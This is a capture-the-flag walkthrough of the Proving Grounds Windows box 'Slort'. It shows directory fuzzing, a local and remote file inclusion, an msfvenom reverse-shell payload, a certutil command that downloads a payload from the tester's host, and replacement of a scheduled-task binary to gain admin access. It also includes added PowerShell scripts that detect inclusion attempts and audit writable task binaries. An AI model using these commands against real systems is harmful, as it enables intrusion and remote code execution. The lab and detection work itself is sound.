# Slort

**Source**: Proving Grounds\
**OS**: Windows\
**Community Rating**: Intermediate

## **Enumeration & Reconnaissance**

* I started as usual with autorecon which exposed: **FTP (21)**, 135, 139, 445, 3306, **HTTP (4443)**, 5040, **HTTP (8080)**, 49664 -> 49669

## **Service Analysis**

* FTP had no anonymous access so I started with the usual, HTTP. Both HTTP sites were XAMPP’s default page. Access to phpMyAdmin was denied, displaying the message:

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FHa0PDyz19Z59D6FQ71km%2Fimage.png?alt=media&#x26;token=34e2a95d-7389-4e8a-9013-e27bce98073f" alt="" width="375"><figcaption><p>XAMPP Default Page</p></figcaption></figure>

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FnQwiKbrNfIIxooZY24JZ%2Fimage.png?alt=media&#x26;token=d67cea3d-59d6-426b-9315-18fee71234c1" alt="" width="375"><figcaption><p>Access Forbidden</p></figcaption></figure>

* I checked the fuzzers but they exposed nothing, and neither SMB nor MySQL provided anything useful. I kept going in circles for a bit until I fuzzed the sites again with a different wordlist:

{% code overflow="wrap" fullWidth="true" %}

```bash
# The original had a stray colon after the port (4443:/FUZZ), which ffuf would not resolve
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://192.168.213.53:4443/FUZZ
```

{% endcode %}

* That’s when "**/site/**" was exposed. This directory contained a simple PHP page with the URL: `http://192.168.213.53:4443/site/index.php?page=main.php` *I’m sure if I were in an anime, a light bulb would have appeared with the text "File Inclusion" flashing before my eyes.*

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FVP5bpGBRJuPMsw6pJDeV%2Fimage.png?alt=media&#x26;token=844172f1-56b1-4f81-810b-8c2069a8c4a9" alt="" width="563"><figcaption><p>site Directory</p></figcaption></figure>

## **Gaining Initial Access**

* I tested the inclusion by visiting: `http://192.168.213.53:4443/site/index.php?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts` which worked!

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2Fo5FFtJ7dJBBRTaBW3EES%2Fimage.png?alt=media&#x26;token=9144401a-e927-4ea5-b822-0a92c819f0c0" alt="" width="563"><figcaption><p>LFI Check</p></figcaption></figure>

* When facing a file inclusion vulnerability, it’s important to check whether it’s Remote File Inclusion (RFI) or only Local File Inclusion (LFI). It turned out we had RFI, and that was all it took: we were able to get a shell!
* I generated a reverse shell payload with msfvenom:

{% code overflow="wrap" fullWidth="true" %}

```bash
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=8178
```

{% endcode %}

* Then triggered it via the vulnerable parameter: `http://192.168.213.53:4443/site/index.php?page=http://192.168.45.170:901/shell.php`

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FL0l9K3c9kXUkYUcP8vxD%2Fimage.png?alt=media&#x26;token=db9bc8d1-ee42-4ded-bb34-69849f7f3350" alt="" width="563"><figcaption><p>Reverse Shell</p></figcaption></figure>
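As an added example that is not part of the write-up, the PowerShell below triages Apache (XAMPP) access-log lines for the kind of `page=` values used above, separating directory traversal (LFI) from remote URL (RFI) attempts; the log lines, timestamps and client address are constructed samples.

```powershell
# Added example (not from the write-up): triage Apache/XAMPP access-log lines for
# file-inclusion attempts against the 'page' parameter of /site/index.php.
# The log lines below are constructed samples in Apache combined log format.
$sampleLog = @'
192.168.45.170 - - [10/May/2024:14:02:11 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
192.168.45.170 - - [10/May/2024:14:03:45 +0000] "GET /site/index.php?page=..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts HTTP/1.1" 200 824 "-" "Mozilla/5.0"
192.168.45.170 - - [10/May/2024:14:05:02 +0000] "GET /site/index.php?page=http://192.168.45.170:901/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
'@ -split "`r?`n"

function Get-IncludeVerdict {
    param([Parameter(Mandatory)][string]$Value)
    # Decode percent-encoding so "..%5C" and "..\" are treated alike
    $decoded = [System.Uri]::UnescapeDataString($Value)
    if ($decoded -match '^(https?|ftp|php|data|file):') { return 'RFI' }
    if ($decoded -match '\.\.[\\/]')                     { return 'LFI-traversal' }
    if ($decoded -match '[\\/:]')                       { return 'suspicious-path' }
    return 'benign'
}

function Find-InclusionAttempts {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        # Pull the request target out of the quoted request line
        if ($line -notmatch '"(?<method>[A-Z]+) (?<target>\S+) HTTP/') { continue }
        $qs = ($Matches.target -split '\?', 2)[1]
        if (-not $qs) { continue }
        $pageValue = $null
        foreach ($pair in $qs -split '&') {
            $kv = $pair -split '=', 2
            if ($kv[0] -eq 'page' -and $kv.Count -eq 2) { $pageValue = $kv[1] }
        }
        if ($null -eq $pageValue) { continue }
        $verdict = Get-IncludeVerdict -Value $pageValue
        if ($verdict -ne 'benign') {
            [pscustomobject]@{
                Client  = ($line -split ' ')[0]
                Verdict = $verdict
                Page    = [System.Uri]::UnescapeDataString($pageValue)
            }
        }
    }
}

Find-InclusionAttempts -Lines $sampleLog | Format-Table -AutoSize
```

Pointing the function at a real `access.log` (`Get-Content` piped into `Find-InclusionAttempts`) flags both the traversal probe and the remote include from this box while leaving the legitimate `main.php` request alone.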

## **Privilege Escalation**

* Once I was in, I uploaded winPEAS and started checking around. The C drive had a Backup directory, and inside I found a file, **info.txt**, containing:

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FbyXN443Y17f7MgrsTZPy%2Fimage.png?alt=media&#x26;token=65adfee0-202d-4772-863a-bd3036269137" alt="" width="375"><figcaption><p>info.txt Content</p></figcaption></figure>

* This indicated a scheduled service (the Windows equivalent of cron jobs). I decided to check whether I had write permission over the directory it ran from, and then performed the following steps:

{% code overflow="wrap" fullWidth="true" %}

```powershell
# Keep the original binary aside so the task's target name stays the same
move TFTP.EXE TFTP_old.EXE
# Fetch the msfvenom payload from the attacker-hosted web server
certutil -urlcache -split -f http://192.168.45.170:901/shell.exe
# Put the payload in place under the name the scheduled task executes
move shell.exe TFTP.EXE
```

{% endcode %}

* There we go, we got a shell back as an admin.

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FQLeTWF9tS7kRuKyEYEz3%2Fimage.png?alt=media&#x26;token=75a2efb0-3a8b-42e7-ad5a-ae9ef17573ae" alt="" width="563"><figcaption><p>Privilege Escalation</p></figcaption></figure>
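The condition this escalation relied on, a scheduled task running a binary from a directory that a low-privileged user can write to, is straightforward to audit. As an added example that is not part of the write-up, the PowerShell below lists enabled scheduled tasks whose action binary, or the directory holding it, grants write access to Everyone, Users or Authenticated Users; it assumes it is run as an administrator on the host being audited.

```powershell
# Added example (not from the write-up): find scheduled tasks whose action binary,
# or the directory it lives in, is writable by non-administrative principals.
# Requires Get-ScheduledTask (Windows 8 / Server 2012 or later) and admin rights.
$lowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Test-WritableByLowPriv {
    param([Parameter(Mandatory)][string]$Path)
    # A missing binary cannot be checked itself; the directory check below still catches it
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path
    # Any of these rights lets the principal replace or alter the file
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete, WriteData'
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-WritableTaskBinaries {
    foreach ($task in Get-ScheduledTask | Where-Object State -ne 'Disabled') {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            # Expand %SystemRoot%-style variables and strip surrounding quotes
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            # Bare names such as "cmd.exe" resolve through PATH; only inspect explicit paths
            if ($exe -notmatch '^[A-Za-z]:\\') { continue }
            $dir = Split-Path -Parent $exe
            $fileWritable = Test-WritableByLowPriv -Path $exe
            $dirWritable  = Test-WritableByLowPriv -Path $dir
            if ($fileWritable -or $dirWritable) {
                [pscustomobject]@{
                    Task         = $task.TaskName
                    RunAs        = $task.Principal.UserId
                    Binary       = $exe
                    FileWritable = $fileWritable
                    DirWritable  = $dirWritable
                }
            }
        }
    }
}

Get-WritableTaskBinaries | Format-Table -AutoSize
```

Any row where `RunAs` is a privileged account and either writable flag is true is the exact situation exploited above; the fix is to tighten the ACL on the binary and its directory, not just the binary.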

## **Lessons Learned**

* Fuzzing with alternative wordlists can reveal hidden directories when initial scans turn up nothing.
* File inclusion vulnerabilities can sometimes allow Remote File Inclusion, granting a quick path to a shell.
* Scheduled tasks or services that run binaries from writable directories are valuable privilege escalation vectors.
